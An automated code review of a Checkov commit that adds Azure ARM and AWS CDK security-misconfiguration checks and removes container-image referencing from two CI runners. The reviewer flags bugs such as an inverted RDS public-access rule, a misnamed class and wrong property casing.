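Review bot: `parameters = conf.get("properties", {}).get("parameters")` can be `None` (or a non-dict if `properties` is malformed) and is passed straight into `find_in_dict`; that helper is not visible here, so unless it tolerates `None` the check raises instead of failing — a guard `if not isinstance(parameters, dict): return CheckResult.FAILED` before the two lookups makes the intent explicit either way. The second test only requires `encryption/value` to be truthy, so an encryption block whose `keySource` is the Microsoft-managed default would still pass a check named "customer-managed key"; if the schema exposes `encryption/value/keySource` (as I believe it does), compare it to `Microsoft.Keyvault` as well. A one-line docstring stating that `prepareEncryption` must be `true` and `encryption` must point at a Key Vault key would make the two-step logic clear.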
@@ -0,0 +1,27 @@ +from __future__ import annotations + +from typing import Any + +from checkov.common.models.enums import CheckResult, CheckCategories +from checkov.arm.base_resource_check import BaseResourceCheck +from checkov.common.util.data_structures_utils import find_in_dict + + +class DatabricksWorkspaceIsNotPublic(BaseResourceCheck): + def __init__(self) -> None: + # https://learn.microsoft.com/en-us/azure/templates/microsoft.databricks/workspaces?pivots=deployment-language-arm-template + name = "Ensure Databricks Workspace data plane to control plane communication happens over private link" + id = "CKV_AZURE_158" + supported_resources = ("Microsoft.Databricks/workspaces",) + categories = (CheckCategories.NETWORKING,) + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def scan_resource_conf(self, conf: dict[str, Any]) -> CheckResult: + public_network_access = find_in_dict(input_dict=conf, key_path="properties/publicNetworkAccess") + if not public_network_access or public_network_access == "Enabled": + return CheckResult.FAILED + + return CheckResult.PASSED + + +check = DatabricksWorkspaceIsNotPublic() diff --git a/checkov/arm/checks/resource/FunctionAppDisallowCORS.py b/checkov/arm/checks/resource/FunctionAppDisallowCORS.py new file mode 100644 index 00000000000..e8b98b464d5 --- /dev/null +++ b/checkov/arm/checks/resource/FunctionAppDisallowCORS.py 
@@ -0,0 +1,24 @@ +from typing import List, Any +from checkov.common.models.enums import CheckCategories, CheckResult +from checkov.arm.base_resource_negative_value_check import BaseResourceNegativeValueCheck + + +class FunctionAppDisallowCORS(BaseResourceNegativeValueCheck): + + def __init__(self) -> None: + name = "Ensure function apps are not accessible from all regions" + id = "CKV_AZURE_62" + supported_resources = ("Microsoft.Web/sites",) + categories = (CheckCategories.GENERAL_SECURITY,) + super().__init__(name=name, id=id, categories=categories, + supported_resources=supported_resources, + missing_block_result=CheckResult.PASSED) + + def get_inspected_key(self) -> str: + return "properties/siteConfig/cors/allowedOrigins" + + def get_forbidden_values(self) -> List[Any]: + return ["*"] + + +check = FunctionAppDisallowCORS() diff --git a/checkov/arm/checks/resource/FunctionAppHttpVersionLatest.py b/checkov/arm/checks/resource/FunctionAppHttpVersionLatest.py new file mode 100644 index 00000000000..a514d7983f7 --- /dev/null +++ b/checkov/arm/checks/resource/FunctionAppHttpVersionLatest.py @@ -0,0 +1,22 @@ +from checkov.arm.base_resource_value_check import BaseResourceValueCheck +from checkov.common.models.enums import CheckCategories + + +class FunctionAppHttpVersionLatest(BaseResourceValueCheck): + + def __init__(self) -> None: + name = "Ensure that 'HTTP Version' is the latest, if used to run the Function app" + id = "CKV_AZURE_67" + supported_resources = ("Microsoft.Web/sites/slots", "Microsoft.Web/sites",) + categories = (CheckCategories.GENERAL_SECURITY,) + super().__init__( + name=name, + id=id, + categories=categories, + supported_resources=supported_resources) + + def get_inspected_key(self) -> str: + return "properties/siteConfig/http20Enabled" + + +check = FunctionAppHttpVersionLatest() 
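Review bot: this check is the same rule as CKV_AZURE_57 (`AppServiceDisallowCORS` earlier in this commit) — same `Microsoft.Web/sites` resource type, same `properties/siteConfig/cors/allowedOrigins` key, same forbidden `"*"` — so every site with wildcard CORS gets two findings, and the name "not accessible from all regions" does not describe a CORS-origin rule. ARM distinguishes function apps from web apps only through the `kind` property (values like `functionapp`, `functionapp,linux`; please confirm the exact set), so the function-app variant should gate on it and leave other sites to CKV_AZURE_57. The override below keeps the base-class value comparison; `Dict` would need importing alongside `List, Any`.
```python
    def scan_resource_conf(self, conf: Dict[str, Any]) -> CheckResult:
        # Only grade function apps; plain web apps are covered by CKV_AZURE_57
        kind = str(conf.get("kind", "")).lower()
        if "functionapp" not in kind:
            return CheckResult.UNKNOWN
        return super().scan_resource_conf(conf)
```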
diff --git a/checkov/arm/checks/resource/FunctionAppMinTLSVersion.py b/checkov/arm/checks/resource/FunctionAppMinTLSVersion.py new file mode 100644 index 00000000000..cefe0dd5825 --- /dev/null +++ b/checkov/arm/checks/resource/FunctionAppMinTLSVersion.py @@ -0,0 +1,26 @@ +from typing import Any, List + +from checkov.common.models.enums import CheckResult, CheckCategories +from checkov.arm.base_resource_value_check import BaseResourceValueCheck + + +class FunctionAppMinTLSVersion(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure Function app is using the latest version of TLS encryption" + id = "CKV_AZURE_145" + supported_resources = ('Microsoft.Web/sites', 'Microsoft.Web/sites/slots',) + categories = [CheckCategories.NETWORKING] + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources, + missing_block_result=CheckResult.PASSED) + + def get_inspected_key(self) -> str: + return "properties/siteConfig/minTlsVersion" + + def get_expected_value(self) -> Any: + return 1.2 + + def get_expected_values(self) -> List[Any]: + return ["1.2", 1.2] + + +check = FunctionAppMinTLSVersion() diff --git a/checkov/arm/checks/resource/FunctionAppsEnableAuthentication.py b/checkov/arm/checks/resource/FunctionAppsEnableAuthentication.py new file mode 100644 index 00000000000..f9d7e801595 --- /dev/null +++ b/checkov/arm/checks/resource/FunctionAppsEnableAuthentication.py 
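Review bot: `missing_block_result=CheckResult.PASSED` grades a site or slot that never sets `properties/siteConfig/minTlsVersion` as compliant on the strength of the platform default, whereas `MSSQLServerMinTLSVersion` in this same commit fails closed on a missing `minimalTlsVersion`; the two should follow one policy, and if the lenient one is kept it needs a comment such as `# absent minTlsVersion relies on the App Service default; re-verify that default is still 1.2`. `get_expected_value` returning the float `1.2` is dead for ARM input, where the property is a JSON string, so `get_expected_values` returning `["1.2"]` (plus `"1.3"` if the platform accepts it) is the only comparison that matters. `categories` is a list while the sibling checks use tuples; pick one.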
@@ -0,0 +1,23 @@ +from checkov.arm.base_resource_value_check import BaseResourceValueCheck +from checkov.common.models.enums import CheckCategories + + +class FunctionAppsEnableAuthentication(BaseResourceValueCheck): + + def __init__(self) -> None: + name = "Ensure that function apps enables Authentication" + id = "CKV_AZURE_56" + supported_resources = ("Microsoft.Web/sites/config",) + categories = (CheckCategories.GENERAL_SECURITY,) + super().__init__(name=name, + id=id, + categories=categories, + supported_resources=supported_resources, + + ) + + def get_inspected_key(self) -> str: + return 'properties/platform/enabled' + + +check = FunctionAppsEnableAuthentication() diff --git a/checkov/arm/checks/resource/MSSQLServerMinTLSVersion.py b/checkov/arm/checks/resource/MSSQLServerMinTLSVersion.py new file mode 100644 index 00000000000..55669a57f29 --- /dev/null +++ b/checkov/arm/checks/resource/MSSQLServerMinTLSVersion.py @@ -0,0 +1,24 @@ +from checkov.common.models.enums import CheckCategories, CheckResult +from checkov.arm.base_resource_value_check import BaseResourceValueCheck + + +class MSSQLServerMinTLSVersion(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure MSSQL is using the latest version of TLS encryption" + id = "CKV_AZURE_52" + supported_resources = ("Microsoft.Sql/servers",) + categories = (CheckCategories.NETWORKING,) + super().__init__(name=name, + id=id, + categories=categories, + supported_resources=supported_resources, + missing_block_result=CheckResult.FAILED,) + + def get_inspected_key(self) -> str: + return "properties/minimalTlsVersion" + + def get_expected_value(self) -> str: + return "1.2" + + +check = MSSQLServerMinTLSVersion() diff --git a/checkov/arm/checks/resource/MySQLPublicAccessDisabled.py b/checkov/arm/checks/resource/MySQLPublicAccessDisabled.py new file mode 100644 index 00000000000..6336a41668a --- /dev/null +++ b/checkov/arm/checks/resource/MySQLPublicAccessDisabled.py 
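Review bot: `supported_resources = ("Microsoft.Web/sites/config",)` matches every config sub-resource of a site — `appsettings`, `web`, `connectionstrings`, `logs`, `metadata` — but `properties/platform/enabled` exists only on the `authsettingsV2` one, so with no `missing_block_result` every other config resource is reported as "function app does not enable Authentication", and the legacy `authsettings` config (`properties/enabled`) is never recognised. Gate on the resource name before delegating to the base class; the stored `name` may be `authsettingsV2` or `<site>/authsettingsV2`, hence the suffix test (please confirm against the ARM parser), and `Dict`, `Any` and `CheckResult` would need importing. The empty line inside the `super().__init__(...)` call is just noise.
```python
    def scan_resource_conf(self, conf: Dict[str, Any]) -> CheckResult:
        # Only the authsettingsV2 config carries platform/enabled; other
        # sites/config resources (appsettings, web, ...) are not auth settings
        name = str(conf.get("name", ""))
        if not name.lower().endswith("authsettingsv2"):
            return CheckResult.UNKNOWN
        return super().scan_resource_conf(conf)
```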
@@ -0,0 +1,23 @@ +from checkov.common.models.enums import CheckCategories +from checkov.arm.base_resource_value_check import BaseResourceValueCheck + + +class MySQLPublicAccessDisabled(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure 'public network access enabled' is set to 'False' for mySQL servers" + id = "CKV_AZURE_53" + supported_resources = ("Microsoft.DBforMySQL/servers",) + categories = (CheckCategories.NETWORKING,) + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources) + + def get_inspected_key(self) -> str: + return "properties/publicNetworkAccess" + + def get_expected_value(self) -> str: + """ + Returns the default expected value, governed by provider best practices + """ + return "disabled" + + +check = MySQLPublicAccessDisabled() diff --git a/checkov/arm/checks/resource/MySQLServerMinTLSVersion.py b/checkov/arm/checks/resource/MySQLServerMinTLSVersion.py new file mode 100644 index 00000000000..ddba3b1261d --- /dev/null +++ b/checkov/arm/checks/resource/MySQLServerMinTLSVersion.py @@ -0,0 +1,23 @@ +from checkov.common.models.enums import CheckCategories +from checkov.arm.base_resource_value_check import BaseResourceValueCheck + + +class MySQLServerMinTLSVersion(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure MySQL is using the latest version of TLS encryption" + id = "CKV_AZURE_54" + supported_resources = ("Microsoft.DBforMySQL/servers",) + categories = (CheckCategories.NETWORKING,) + super().__init__(name=name, + id=id, + categories=categories, + supported_resources=supported_resources, ) + + def get_inspected_key(self) -> str: + return "properties/minimalTlsVersion" + + def get_expected_value(self) -> str: + return "TLS1_2" + + +check = MySQLServerMinTLSVersion() diff --git a/checkov/arm/checks/resource/StorageSyncPublicAccessDisabled.py b/checkov/arm/checks/resource/StorageSyncPublicAccessDisabled.py new file mode 100644 index 00000000000..cca500a26dd 
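Review bot: `get_expected_value` returns the lowercase `"disabled"`, but the `publicNetworkAccess` enum in ARM templates is written `Disabled`/`Enabled`; unless the base class compares case-insensitively (not visible here), a correctly hardened server fails this check and only a template that happens to use lowercase passes. Return both spellings via `def get_expected_values(self) -> list: return ["Disabled", "disabled"]`, or confirm and document the base-class comparison. The docstring "Returns the default expected value, governed by provider best practices" is boilerplate that says nothing the method name does not; replace it with the actual fact, e.g. `# ARM enum value for publicNetworkAccess; anything else leaves public access on`.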
--- /dev/null +++ b/checkov/arm/checks/resource/StorageSyncPublicAccessDisabled.py @@ -0,0 +1,21 @@ +from checkov.common.models.enums import CheckCategories, CheckResult +from checkov.arm.base_resource_value_check import BaseResourceValueCheck + + +class NetworkInterfaceEnableIPForwarding(BaseResourceValueCheck): + def __init__(self) -> None: + name = "Ensure that Azure File Sync disables public network access" + id = "CKV_AZURE_64" + supported_resources = ('Microsoft.StorageSync/storageSyncServices',) + categories = (CheckCategories.NETWORKING,) + super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources, + missing_block_result=CheckResult.FAILED) + + def get_inspected_key(self) -> str: + return 'properties/incomingTrafficPolicy' + + def get_expected_value(self) -> str: + return 'AllowVirtualNetworksOnly' + + +check = NetworkInterfaceEnableIPForwarding() diff --git a/checkov/azure_pipelines/image_referencer/__init__.py b/checkov/azure_pipelines/image_referencer/__init__.py deleted file mode 100644 index e69de29bb2d..00000000000 diff --git a/checkov/azure_pipelines/image_referencer/manager.py b/checkov/azure_pipelines/image_referencer/manager.py deleted file mode 100644 index e87cd8f9955..00000000000 --- a/checkov/azure_pipelines/image_referencer/manager.py +++ /dev/null @@ -1,13 +0,0 @@ -from __future__ import annotations - -from typing import Any - -from checkov.azure_pipelines.image_referencer.provider import AzurePipelinesProvider -from checkov.common.images.workflow.image_referencer_manager import WorkflowImageReferencerManager - - -class AzurePipelinesImageReferencerManager(WorkflowImageReferencerManager): - - def __init__(self, workflow_config: dict[str, Any], file_path: str): - provider = AzurePipelinesProvider(workflow_config=workflow_config, file_path=file_path) - super().__init__(workflow_config, file_path, provider) 
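Review bot: the class in `StorageSyncPublicAccessDisabled.py` is named `NetworkInterfaceEnableIPForwarding` (and so is the `check = ...` instance), a copy-paste leftover that has nothing to do with Azure File Sync and will be confused with, or collide with, a real NIC check of that name in the same package. Rename both lines: `class StorageSyncPublicAccessDisabled(BaseResourceValueCheck):` and `check = StorageSyncPublicAccessDisabled()`. The logic itself — `incomingTrafficPolicy` must be `AllowVirtualNetworksOnly`, absent fails — looks right; a comment that `AllowAllTraffic` is the platform default and therefore the failing case would help the next reader (that default is my recollection; please confirm).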
diff --git a/checkov/azure_pipelines/image_referencer/provider.py b/checkov/azure_pipelines/image_referencer/provider.py deleted file mode 100644 index 7bd00e0bf6f..00000000000 --- a/checkov/azure_pipelines/image_referencer/provider.py +++ /dev/null 
@@ -1,71 +0,0 @@ -from __future__ import annotations - -from typing import Any - -from checkov.common.images.image_referencer import Image -from checkov.azure_pipelines.common.resource_id_utils import generate_resource_key_recursive -from checkov.common.images.workflow.image_referencer_provider import WorkflowImageReferencerProvider - - -class AzurePipelinesProvider(WorkflowImageReferencerProvider): - - def __init__(self, workflow_config: dict[str, Any], file_path: str): - super().__init__(workflow_config, file_path) - self.supported_keys = "container" - - def extract_images_from_workflow(self) -> list[Image]: - """ - We use a general extraction in azure_pipelines because we can display images in different ways: - - container - - container.image - - resources.containers[].container... - - jobs[].container... - - jobs[].steps.task.inputs.container... - - jobs[].strategy.container... - - stages[].jobs[]... - """ - images = self.extract_images_from_dict(self.workflow_config) - return images - - def extract_images_from_list(self, objects_list: list[dict[str, Any]]) -> list[Image]: - images = [] - for job in objects_list: - if isinstance(job, dict): - images.extend(self.extract_images_from_dict(job)) - if isinstance(job, list): - images.extend(self.extract_images_from_list(job)) - return images - - def extract_images_from_dict(self, job: dict[str, Any]) -> list[Image]: - images = [] - start_line, end_line = AzurePipelinesProvider._get_start_end_lines(job) - for key, sub_job in job.items(): - if key == self.supported_keys: - image = self.create_image(sub_job, start_line, end_line) - if image: - images.append(image) - elif isinstance(sub_job, dict): - images.extend(self.extract_images_from_dict(sub_job)) - elif isinstance(sub_job, list): - images.extend(self.extract_images_from_list(sub_job)) - return images - - def create_image(self, container: dict[str, Any] | str, start_line: int, end_line: int) -> Image | None: - image_name = '' - if isinstance(container, str): - 
image_name = container - elif isinstance(container, dict): - if 'image' in container: - image_name = container['image'] - related_resource_id = generate_resource_key_recursive(file_conf=self.workflow_config, - resource_key='', - start_line=start_line, - end_line=end_line) - if image_name and related_resource_id: - return Image( - file_path=self.file_path, - name=image_name, - start_line=start_line, - end_line=end_line, - related_resource_id=related_resource_id) - return None diff --git a/checkov/azure_pipelines/runner.py b/checkov/azure_pipelines/runner.py index baf6a8535c5..2ff89a2c387 100644 --- a/checkov/azure_pipelines/runner.py +++ b/checkov/azure_pipelines/runner.py @@ -1,24 +1,19 @@ from __future__ import annotations -import os from typing import TYPE_CHECKING, Any, Optional from checkov.azure_pipelines.checks.registry import registry from checkov.azure_pipelines.common.resource_id_utils import generate_resource_key_recursive -from checkov.azure_pipelines.image_referencer.manager import AzurePipelinesImageReferencerManager -from checkov.common.images.image_referencer import ImageReferencerMixin, Image from checkov.common.output.report import CheckType, Report from checkov.runner_filter import RunnerFilter from checkov.yaml_doc.runner import Runner as YamlRunner - if TYPE_CHECKING: from checkov.common.checks.base_check_registry import BaseCheckRegistry from collections.abc import Iterable - from networkx import DiGraph -class Runner(ImageReferencerMixin["dict[str, dict[str, Any] | list[dict[str, Any]]]"], YamlRunner): +class Runner(YamlRunner): check_type = CheckType.AZURE_PIPELINES # noqa: CCE003 # a static attribute def require_external_checks(self) -> bool: 
@@ -57,43 +52,4 @@ def run( runner_filter = runner_filter or RunnerFilter() report = super().run(root_folder=root_folder, external_checks_dir=external_checks_dir, files=files, runner_filter=runner_filter, collect_skip_comments=collect_skip_comments) - if runner_filter.run_image_referencer: - if files: - # 'root_folder' shouldn't be empty to remove the whole path later and only leave the shortened form - root_folder = os.path.split(os.path.commonprefix(files))[0] - - image_report = self.check_container_image_references( - root_path=root_folder, - runner_filter=runner_filter, - definitions=self.definitions - ) - - if image_report: - return [report, image_report] # type:ignore[list-item] # report can only be of type Report, not a list - return report - - def extract_images( - self, - graph_connector: DiGraph | None = None, - definitions: dict[str, dict[str, Any] | list[dict[str, Any]]] | None = None, - definitions_raw: dict[str, list[tuple[int, str]]] | None = None - ) -> list[Image]: - images: list[Image] = [] - if not definitions: - return images - - for file, config in definitions.items(): - if isinstance(config, list): - continue - is_container = False - for row in self.definitions_raw.get(file, []): - if 'container' in row[1]: - is_container = True - break - if not is_container: - return images - manager = AzurePipelinesImageReferencerManager(workflow_config=config, file_path=file) - images.extend(manager.extract_images_from_workflow()) - - return images diff --git a/checkov/bitbucket_pipelines/runner.py b/checkov/bitbucket_pipelines/runner.py index 9114527adba..3f617c8768a 100644 --- a/checkov/bitbucket_pipelines/runner.py +++ b/checkov/bitbucket_pipelines/runner.py 
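Review bot: after this removal `runner_filter.run_image_referencer` is simply ignored for Azure Pipelines — the `if runner_filter.run_image_referencer:` branch and `extract_images` are gone — so a user who enables image referencing gets no second report and no indication that this framework no longer supports it. Add a debug log when the flag is set (via the module's logger, e.g. `logging.debug("image referencing is not supported by the azure_pipelines runner")`) or a changelog/docs note so the silent drop is discoverable. The `run` method's signature and its `super().run(...)` call start above this hunk, so I cannot see whether the `files` parameter still has a use now that the `commonprefix` root-folder logic is deleted.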
@@ -1,11 +1,8 @@ from __future__ import annotations -from typing import Any, TYPE_CHECKING, cast - -import jmespath +from typing import Any, TYPE_CHECKING from checkov.bitbucket_pipelines.registry import registry -from checkov.common.images.image_referencer import ImageReferencer, Image from checkov.common.bridgecrew.check_type import CheckType from checkov.yaml_doc.runner import Runner as YamlRunner @@ -13,7 +10,7 @@ from checkov.common.checks.base_check_registry import BaseCheckRegistry -class Runner(YamlRunner, ImageReferencer): +class Runner(YamlRunner): check_type = CheckType.BITBUCKET_PIPELINES # noqa: CCE003 # a static attribute def __init__(self) -> None: @@ -25,15 +22,6 @@ def require_external_checks(self) -> bool: def import_registry(self) -> BaseCheckRegistry: return registry - @staticmethod - def _parse_file( - f: str, file_content: str | None = None - ) -> tuple[dict[str, Any] | list[dict[str, Any]], list[tuple[int, str]]] | None: - if Runner.is_workflow_file(f): - return YamlRunner._parse_file(f) - - return None - @staticmethod def is_workflow_file(file_path: str) -> bool: """ 
@@ -41,103 +29,11 @@ def is_workflow_file(file_path: str) -> bool: """ return file_path.endswith(("bitbucket-pipelines.yml", "bitbucket-pipelines.yaml")) - def get_images(self, file_path: str) -> set[Image]: - """ - Get container images mentioned in a file - :param file_path: File to be inspected - - File sample that will return 4 Image objects: - #image: node:10.15.0 - # - #pipelines: - # default: - # - step: - # name: Build and test - # image: node:10.0.0 - # script: - # - npm install - # - npm test - # - npm run build - # artifacts: - # - dist/** - # - step: - # name: Deploy - # image: python:3.7.2 - # trigger: manual - # script: - # - python deploy.py - # custom: - # sonar: - # - step: - # image: python:3.8.2 - # script: - # - echo "Manual triggers for Sonar are awesome!" - # deployment-to-prod: - # - step: - # script: - # - echo "Manual triggers for deployments are awesome!" - # branches: - # staging: - # - step: - # script: - # - echo "Auto pipelines are cool too." - :return: List of container image objects mentioned in the file. 
- - """ - - images: set[Image] = set() - parsed_file = self._parse_file(file_path) - - if not parsed_file: - return images - - workflow, workflow_line_numbers = parsed_file - - if not isinstance(workflow, dict): - # make type checking happy - return images - - self.add_default_and_pipelines_images(workflow, images, file_path) - self.add_root_image(file_path, images, workflow_line_numbers, workflow) - - return images - - def add_default_and_pipelines_images(self, workflow: dict[str, Any], images: set[Image], file_path: str) -> None: - """ - - :param workflow: parsed workflow file - :param images: set of images to be updated - :param file_path: path of analyzed workflow - """ - keywords = [ - "pipelines.default[].step.{image: image, __startline__: __startline__, __endline__:__endline__}", - "pipelines.*.[*][][][].step.{image: image, __startline__: __startline__, __endline__:__endline__}", - ] - for keyword in keywords: - results = cast("list[dict[str, Any]]", jmespath.search(keyword, workflow)) - for result in results: - image_name = result.get("image", None) - if image_name: - image_obj = Image( - file_path=file_path, - name=image_name, - start_line=result["__startline__"], - end_line=result["__endline__"], - ) - images.add(image_obj) - - def add_root_image( - self, file_path: str, images: set[Image], workflow_line_numbers: list[tuple[int, str]], workflow: dict[str, Any] - ) -> None: - root_image = workflow.get("image", "") + @staticmethod + def _parse_file( + f: str, file_content: str | None = None + ) -> tuple[dict[str, Any] | list[dict[str, Any]], list[tuple[int, str]]] | None: + if Runner.is_workflow_file(f): + return YamlRunner._parse_file(f) - if root_image: - for line_number, line_txt in workflow_line_numbers: - if "image" in line_txt and not line_txt.startswith(" "): - image_obj = Image( - file_path=file_path, - name=root_image, - start_line=line_number, - end_line=line_number, - ) - images.add(image_obj) + return None 
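Review bot: the relocated `_parse_file` accepts `file_content: str | None` but forwards only `f` to `YamlRunner._parse_file(f)`, so any caller that passes pre-read content has it discarded and the file is read from disk again; assuming `YamlRunner._parse_file` takes the same optional second argument (its signature is mirrored here), the call should be `return YamlRunner._parse_file(f, file_content)`. This is a move rather than a new bug, but the moved code is the new side and the parameter is otherwise dead. The deleted `get_images` body was the only in-class caller of `_parse_file`; please confirm the base runner still invokes it, otherwise the override is now unreachable.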
diff --git a/checkov/cdk/checks/typescript/RDSMultiAZEnabled.yaml b/checkov/cdk/checks/typescript/RDSMultiAZEnabled.yaml new file mode 100644 index 00000000000..6d6792fa95b --- /dev/null +++ b/checkov/cdk/checks/typescript/RDSMultiAZEnabled.yaml @@ -0,0 +1,25 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_366 + name: Ensure that RDS instances have Multi-AZ enabled + category: NETWORKING + framework: cdk +scope: + languages: + - javascript + - typescript +definition: + or: + - pattern: new $FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(CfnDBInstance|DatabaseInstance) + - not_pattern: | + 'new $FUNC(, multiAZ: true ,)' + - pattern: new $RDS.$FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(CfnDBInstance|DatabaseInstance) + - not_pattern: | + 'new $RDS.$FUNC(, multiAZ: true ,)' \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/RDSPubliclyAccessible.yaml b/checkov/cdk/checks/typescript/RDSPubliclyAccessible.yaml new file mode 100644 index 00000000000..a4f215f4631 --- /dev/null +++ b/checkov/cdk/checks/typescript/RDSPubliclyAccessible.yaml @@ -0,0 +1,25 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_367 + name: Ensure all data stored in RDS is not publicly accessible + category: NETWORKING + framework: cdk +scope: + languages: + - javascript + - typescript +definition: + or: + - pattern: new $FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(CfnDBInstance|DatabaseInstance) + - not_pattern: | + 'new $FUNC(, publicly_accessible: true ,)' + - pattern: new $RDS.$FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(CfnDBInstance|DatabaseInstance) + - not_pattern: | + 'new $RDS.$FUNC(, publicly_accessible: true ,)' diff --git a/checkov/cdk/checks/typescript/RedShiftSSL.yaml b/checkov/cdk/checks/typescript/RedShiftSSL.yaml new file mode 100644 index 00000000000..d446b6b7df4 --- /dev/null +++ b/checkov/cdk/checks/typescript/RedShiftSSL.yaml 
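Review bot: the `not_pattern` uses `multiAZ: true`, but in the CDK TypeScript bindings both `CfnDBInstanceProps` and `DatabaseInstanceProps` spell the property `multiAz` (CloudFormation's `MultiAZ` is lower-camel-cased by the code generator, as far as I know), so a correctly configured `new DatabaseInstance(this, 'db', { multiAz: true })` still fails this check. Change both `not_pattern` strings to `'new $FUNC(, multiAz: true ,)'` and `'new $RDS.$FUNC(, multiAz: true ,)'`, and add a passing fixture with `multiAz: true` to the CDK integration tests so the casing is pinned.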
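Review bot: the definition is inverted: with `approach: define failing`, `pattern: new $FUNC()` plus `not_pattern: '... publicly_accessible: true ...'` marks every instance that does not set the property to true as failing, i.e. private instances fail and public ones pass. `RedshiftClusterPubliclyAccessible.yaml` later in this commit has the right shape — match the failing literal directly — and the property should be the TypeScript `publiclyAccessible`, not the Python-style `publicly_accessible`. The corrected definition is below; the pass/fail fixtures for this check will need to flip as well.
```yaml
definition:
  or:
    - pattern: |
        'new $FUNC(, publiclyAccessible: true ,)'
      conditions:
        - metavariable: $FUNC
          regex: (?i)(CfnDBInstance|DatabaseInstance)
    - pattern: |
        'new $RDS.$FUNC(, publiclyAccessible: true ,)'
      conditions:
        - metavariable: $FUNC
          regex: (?i)(CfnDBInstance|DatabaseInstance)
```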
@@ -0,0 +1,22 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_369 + name: Ensure Redshift uses SSL + category: ENCRYPTION + framework: cdk +scope: + languages: + - javascript + - typescript +definition: + or: + - pattern: new $REDSHIFT.CfnClusterParameterGroup() + conditions: + - not_pattern: | + "new $REDSHIFT.CfnClusterParameterGroup(, require_ssl: 'true', )" + - pattern: | + "new CfnClusterParameterGroup(, require_ssl: 'true', )" + conditions: + - not_pattern: | + "new CfnClusterParameterGroup(, require_ssl: 'true', )" diff --git a/checkov/cdk/checks/typescript/RedshiftClusterEncryption.yaml b/checkov/cdk/checks/typescript/RedshiftClusterEncryption.yaml new file mode 100644 index 00000000000..a1660a2b98b --- /dev/null +++ b/checkov/cdk/checks/typescript/RedshiftClusterEncryption.yaml @@ -0,0 +1,23 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_368 + name: Ensure all data stored in the Redshift cluster is securely encrypted at rest + category: ENCRYPTION + framework: cdk +scope: + languages: + - javascript + - typescript +definition: + or: + - pattern: | + 'new $FUNC(, encrypted: false ,)' + conditions: + - metavariable: $FUNC + regex: (?i)(CfnCluster|Cluster|ClusterProps) + - pattern: | + 'new $REDSHIFT.$FUNC(, encrypted: false ,)' + conditions: + - metavariable: $FUNC + regex: (?i)(CfnCluster|Cluster|ClusterProps) \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/RedshiftClusterLogging.yaml b/checkov/cdk/checks/typescript/RedshiftClusterLogging.yaml new file mode 100644 index 00000000000..c8de486aa80 --- /dev/null +++ b/checkov/cdk/checks/typescript/RedshiftClusterLogging.yaml 
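Review bot: The second alternative in RedShiftSSL.yaml can never fire: its `pattern` and `not_pattern` are the identical string `"new CfnClusterParameterGroup(, require_ssl: 'true', )"`, so the condition demands a match and a non-match of the same text. Mirroring the first branch, it should be `pattern: new CfnClusterParameterGroup()` with the `require_ssl` form kept only in the not_pattern. It is also worth checking against a real stack whether `require_ssl: 'true'` ever appears as a direct constructor key — on CfnClusterParameterGroup the setting is normally carried inside the `parameters` list as a parameterName/parameterValue pair, in which case neither branch would see a passing configuration. RedshiftClusterEncryption.yaml reports only an explicit `encrypted: false`; if CfnCluster is unencrypted when the key is omitted, a not_pattern form like the sibling checks is needed to catch the default.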
@@ -0,0 +1,25 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_370 + name: Ensure Redshift Cluster logging is enabled + category: LOGGING + framework: cdk +scope: + languages: + - javascript + - typescript +definition: + or: + - pattern: new $FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(CfnCluster|Cluster|ClusterProps) + - not_pattern: | + 'new $FUNC(, logging_properties: $FUNC.LoggingPropertiesProperty = {, bucketName:$ARG, } ,)' + - pattern: new $REDSHIFT.$FUNC() + conditions: + - metavariable: $FUNC + regex: (?i)(CfnCluster|Cluster|ClusterProps) + - not_pattern: | + 'new $REDSHIFT.$FUNC(, logging_properties: $REDSHIFT.$FUNC.LoggingPropertiesProperty = {, bucketName:$ARG, } ,)' \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/RedshiftClusterPubliclyAccessible.yaml b/checkov/cdk/checks/typescript/RedshiftClusterPubliclyAccessible.yaml new file mode 100644 index 00000000000..df862542b8a --- /dev/null +++ b/checkov/cdk/checks/typescript/RedshiftClusterPubliclyAccessible.yaml @@ -0,0 +1,23 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_371 + name: Redshift cluster should not be publicly accessible + category: NETWORKING + framework: cdk +scope: + languages: + - javascript + - typescript +definition: + or: + - pattern: | + 'new $FUNC(, publiclyAccessible: true ,)' + conditions: + - metavariable: $FUNC + regex: (?i)(CfnCluster|Cluster|ClusterProps) + - pattern: | + 'new $REDSHIFT.$FUNC(, publiclyAccessible: true ,)' + conditions: + - metavariable: $FUNC + regex: (?i)(CfnCluster|Cluster|ClusterProps) \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/RedshiftInEc2ClassicMode.yaml b/checkov/cdk/checks/typescript/RedshiftInEc2ClassicMode.yaml new file mode 100644 index 00000000000..fd1d7802457 --- /dev/null +++ b/checkov/cdk/checks/typescript/RedshiftInEc2ClassicMode.yaml 
